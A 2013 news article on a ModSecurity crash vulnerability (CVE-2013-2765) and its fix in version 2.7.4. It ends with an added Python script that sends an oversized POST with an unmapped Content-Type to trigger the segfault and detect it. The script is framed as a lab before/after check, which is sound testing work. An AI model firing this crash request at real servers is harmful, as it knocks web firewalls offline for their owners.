ModSecurity Firewall Hole Fixed

Wednesday, May 29, 2013 @ 12:05 PM gHale


The developers of the open source web application firewall ModSecurity have fixed a vulnerability that lets an attacker crash the firewall with a crafted request.

A crafted HTTP request that causes the forceRequestBodyVariable action to run on a request body with an unknown content type triggers a null pointer dereference, and the ModSecurity process crashes.

The developers said the problem is fixed in version 2.7.4, which also fixes a number of other bugs and adds libinjection to identify SQL injection attacks.

The developers also said the nginx port has now reached stable status.

Younes Jaaidi, the researcher who discovered the vulnerability, posted more details about the flaw, which has been allocated the identifier CVE-2013-2765.

“When ModSecurity receives a request body with a size bigger than the value set by the ‘SecRequestBodyInMemoryLimit’ and with a ‘Content-Type’ that has no request body processor mapped to it, ModSecurity will systematically crash on every call to ‘forceRequestBodyVariable’ (in phase 1),” Jaaidi said in a blog posting.

“In addition to the segfault that occurs here, ModSecurity will not remove the temporary request body file and the temporary directory (set by the ‘SecTmpDir’ directive) will keep growing until saturation.

“As an example, in the latest core rule set (2.2.7), ‘forceRequestBodyVariable’ can be triggered by sending a POST request with some random ‘Content-Type’ (rule 960010),” he said.

Jaaidi also released proof-of-concept code for the exploit on GitHub.
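The two preconditions Jaaidi describes, a body larger than SecRequestBodyInMemoryLimit and a Content-Type that no request body processor is mapped to, are easy to check for in a lab. The following script is an added example written for this article; it is not Jaaidi's proof-of-concept and not ModSecurity project code. It builds a POST that meets both conditions, sends it to a server you control, and classifies the reply so the result can be used as a before/after regression check for the 2.7.4 update. The default in-memory limit of 128 KiB, the set of media types assumed to have a processor (URLENCODED and MULTIPART only, since XML and others are mapped by rules rather than by default), the lab host and port, and the reading of an empty reply as a crashed worker are all assumptions, not facts taken from the article.

```python
"""Probe for the CVE-2013-2765 crash condition in ModSecurity 2.x.

Added example, not the researcher's PoC and not ModSecurity project code.
Builds a POST whose body exceeds SecRequestBodyInMemoryLimit and whose
Content-Type has no request body processor, then classifies the server's
reaction.  Host, port, path, the limit and the processor list are
assumptions for a lab instance you own.
"""
import socket

# Assumption: media types ModSecurity 2.7 maps to a body processor without
# any extra rule.  XML (and later JSON) need a ctl:requestBodyProcessor rule,
# so they are deliberately left out here.
MAPPED_CONTENT_TYPES = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
}

# Assumption: the default SecRequestBodyInMemoryLimit of 128 KiB.
DEFAULT_IN_MEMORY_LIMIT = 131072


def media_type(content_type):
    """Strip parameters such as '; charset=utf-8' and normalise case."""
    return content_type.split(";", 1)[0].strip().lower()


def hits_crash_condition(content_type, body_length,
                         in_memory_limit=DEFAULT_IN_MEMORY_LIMIT,
                         mapped=MAPPED_CONTENT_TYPES):
    """True when a request meets both preconditions from the advisory:
    body larger than the in-memory limit and a Content-Type with no
    request body processor mapped to it."""
    return body_length > in_memory_limit and media_type(content_type) not in mapped


def build_request(host, path, content_type, body_length):
    """Raw HTTP/1.1 POST as bytes; the body is filler, its content is
    irrelevant to the bug, only its size matters."""
    body = b"A" * body_length
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: {content_type}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
    )
    return head.encode("ascii") + body


def classify(response):
    """Interpret the reply.  Assumption: a segfaulting Apache child yields
    an empty reply or a reset, while a patched server answers normally
    (typically a 403 from the core rules or the application's response)."""
    if not response:
        return "no response (possible worker crash)"
    status_line = response.split(b"\r\n", 1)[0]
    parts = status_line.split()
    if len(parts) >= 2 and parts[0].startswith(b"HTTP/") and parts[1].isdigit():
        return "HTTP " + parts[1].decode("ascii")
    return "garbled response"


def probe(host, port, path="/", content_type="application/x-unknown",
          body_length=DEFAULT_IN_MEMORY_LIMIT + 1, timeout=5.0):
    """Send one probe request to a lab server and classify the outcome.
    Only point this at systems you are authorised to test: on an unpatched
    server it will crash the worker handling the request."""
    request = build_request(host, path, content_type, body_length)
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except (ConnectionResetError, socket.timeout):
            pass
    return classify(b"".join(chunks))


if __name__ == "__main__":
    # Assumed lab endpoint; adjust host, port and path to your own test box.
    print(probe("127.0.0.1", 8080))
```

Run it once before and once after upgrading to 2.7.4: an unpatched instance typically produces an empty reply as the worker segfaults, while a patched one returns a normal HTTP status. If you have tuned SecRequestBodyInMemoryLimit, pass the same value to hits_crash_condition and as body_length to probe, since a body that still fits in memory will not reach the faulty code path.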
